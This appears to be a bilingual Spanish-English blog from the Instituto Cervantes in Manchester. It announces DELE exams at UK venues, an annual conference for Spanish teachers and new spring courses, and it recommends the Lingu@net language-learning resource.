Parece que el español cada vez tiene más presencia en la tierra de Shakespeare. Durante este mes de mayo, más de 200 candidatos van a intentar conseguir el Diploma de Español como Lengua Extranjera, en 12 centros habilitados por el Instituto Cervantes, entre los que se encuentran algunas de las principales universidades del país.

It seems that the Spanish language is spreading out in Shakespeare´s land. More than 200 candidates are going to take the exam for the Diploma in Spanish DELE in May. It is taking place in 12 different venues, some of the main British universities among them. All of the places will have the special supervision of Instituto Cervantes.

Jornadas didácticas

El Instituto Cervantes de Mánchester organiza por noveno año consecutivo unas jornadas de intercambio de experiencias y materiales para profesores de español del Reino Unido e Irlanda.

Acércate el 1de Julio y disfruta de talleres prácticos y dos sesiones ofrecidas por José Angle Medina y Alan Maley. Dos expertos ponentes que hablarán sobre el efecto que el discurso del profesor puede tener en el aula y la creatividad en el proceso de la enseñanza y el aprendizaje de una segunda lengua. (+)

The Instituto Cervantes in Manchester is pleased to announce a special day for teachers of Spanish in the Uk & Ireland, to share a wealth of experience and resources.

This annual conference will consist of different workshops and two plenary sessions offered by the experts José Ángel Medina and Alan Maley. The lecturers will talk about the effects of the speech of teachers and the creativity in the process of teaching and learning a second language. (+)

La primavera ha llegado a Manchester, y con ella el sol, las flores y la subida de temperatura. El Instituto Cervantes se suma a la nueva estación lanzando nuevos cursos generales de español de todos los niveles y también cursos especiales dedicados a la literatura, la traducción, el catalán y la preparación del DELE.

Si estas pensando en pasar tus próximas vacaciones en un lugar de habla hispana, o incluso catalana, esta es una buena ocasión para desempolvar tu español, mejorarlo o incluso de empezar a conocerlo desde cero. Spring seems to be finally approaching  Manchester, bringing sun, flowers and raising the temperatures. Instituto Cervantes wishes to contribute to the new season, so we are launching new Spanish courses of different levels as well as special courses to learn about literature, translation, catalán and to prepare the DELE exams (Diploma of Spanish as a Foreign Language).

Queremos que este blog sea un instrumento útil para los alumnos de español y, para ello, vamos a recomendar cada semana páginas con enlaces a recursos interesantes  para aprender más gramática, para encontrar lecturas interesantes, para escuchar podcasts dirigidos a estudiantes de español…

Pero el primer enlace con recursos que os recomendamos es el de Lingu@net. Lingu@net es un proyecto financiado por el Consejo de Europa en el que también participa el Instituto Cervantes, y que pretende llegar a ser el mayor centro de recursos multilingüe para alumnos y profesores de idiomas.

Os recomendamos muy especialmente su sección Consejos para estudiantes,  donde podréis  aprender estrategias muy útiles para solventar cualquier obstáculo que encontréis en vuestro aprendizaje de idiomas.

 Our first recommendation is a link to Lingu@net. Lingu@net is a project funded by the Council of Europe, with the collaboration of the Instituto Cervantes that aims to be the largest multilingual resource for language students. We especially recommend the section on Tips for Learners,  where you can learn handy strategies to solve any obstacle that you might come across with your learning.
